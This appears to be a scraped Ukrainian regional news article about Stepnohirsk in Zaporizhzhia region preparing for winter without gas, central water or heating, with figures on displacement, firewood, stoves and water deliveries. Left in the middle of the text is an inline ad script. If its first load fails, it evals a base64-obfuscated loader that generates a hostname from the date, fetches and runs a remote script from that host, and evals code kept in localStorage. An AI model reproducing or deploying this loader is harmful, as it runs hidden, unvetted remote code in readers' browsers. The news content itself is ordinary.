Без води, газу та опалення: як у Степногірську готуються до зими (ФОТО)

До 24 лютого в Степногірській територіальній громаді проживало 9,5 тис. людей. Нині три населених пункти громади окуповано, на підконтрольній Україні території лишилося чотири, з яких виїхали понад половина мешканців.

Суспільне поспілкувалося про долю місцевих жителів напередодні холодів з головою громади Іриною Кондратюк.

Демографічна ситуація та гуманітарні проблеми

За словами голови, багато людей продовжує проживати у селі Приморське і в Степногірську. Загалом з Приморського виїхало майже 50%, зі Степногірська більше — лишилися близько 30%. Є ще два села, звідкіля повністю виїхали люди, і де вже вщент зруйновані будинки. Люди, які залишаються в громаді не виїжджають, бо не мають куди їхати, і загалом не мають грошей на життя.

"Треба буде виїжджати". Як у Степногірську на Запоріжжі готуються до зими без газу і води
Фото: Суспільне Запоріжжя

До громади, зокрема до Степногірська і с. Приморське курсує громадський транспорт, п’ять разів на день. Вартість проїзду на маршрутці в один бік — 50 грн.

У громаді нині працюють продуктові магазини, де можна розрахуватися карткою, а от зняти готівку немає де. Зокрема й пенсіонери, які отримують пенсію на картку, можуть зняти її лише у Запоріжжі. Заборгованості по виплатах пенсій і заробітних плат немає, є питання по виплатах пільг і субсидій, але їх намагаються вирішити, каже Ірина Кондратюк.

“Закриті аптеки в Степногірську і в с. Приморське, на жаль, люди виїхали. На жаль, в Степногірську з медициною не дуже добре, тому що сімейний лікар також виїхав. В с. Приморське є сімейні лікарі, ми звертаємося туди. Працює швидка допомога у нас в Степногірську. Є можливість звернутися на фельдшерський пункт і отримати допомогу».

Також частину функцій цивільної медичної інфраструктури перейняли військові, зокрема допомагають доставляти поранених після обстрілів до лікарень.

Опалювальний сезон та комунікації

Зараз, за словами Ірини Кондратюк, в громаді готуються до опалювального сезону:

“В нас немає централізованого опалення, і в нас ніколи не було природного газу. Ми до війни так і не змогли його довести до Степногірська. Ні в Приморському, ні в населених пунктах, які навколо Степногірська газу не було. Після 2004 року, коли призупинили централізоване опалення, ми перейшли на електроенергію, ми повністю залежимо від електроенергії». var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

На зиму планують закупити дров на декілька мільйонів гривень. Придбали десять буржуйок і планують ще п’ять. Їх можна буде встановити у підвальних приміщеннях багатоповерхівок, щоб там можна було перебути певний час перед евакуацією.

«Ми облаштовуємо пункти обігріву і до людей доносимо, що треба буде виїжджати, тому що в приватному секторі є пічки, які можна затопити, а в багатоповерховому будинку не поставиш буржуйку. Ми вже цей досвід мали. Але деякі люди категорично проти. Намагаємося звичайно зараз розселяти максимально людей по приватному сектору, до родичів, до знайомих.»

"Треба буде виїжджати". Як у Степногірську на Запоріжжі готуються до зими без газу і води
Фото: Суспільне Запоріжжя

Також місцевим жителям видають будівельні матеріали, аби ремонтувати пошкоджені будинки. Частину будматеріалів видають безплатно, частину люди купують самі.

Загалом зараз у громаді нараховується близько 500 приватних будинків, з яких 260 заселені, а також 14 п’ятиповерхівок, 7 дев’ятиповерхівок, де загалом 1700 квартир.

«Зараз ми більше переймаємося за каналізацію, водовідведення, тому що люди виїхали й опалювати квартири не будуть, і ось в цьому у нас може бути велика проблема. В Степногірську немає централізованого водозабезпечення з 1 березня. Свердловини знаходяться на окупованій території, ми до них добратися не можемо, щоб їх відновити, тому туди ми воду через день завозимо і є у нас приватні свердловини, люди приходять і набирають воду».

Також у Степногірську працює дільниця від обласного водоканалу, куди привозять воду в бочках із Запоріжжя.

Підрахувати збитки завдані окупантами громаді поки неможливо. Недовиконання бюджету на кінець 2022 року складатиме 40%, але в громаді дуже економлять, зокрема на електроенергії. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/bez-vodi-gazu-ta-opalennya-yak-u-stepnogirsku-gotuyutsya-do-zimi-foto/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top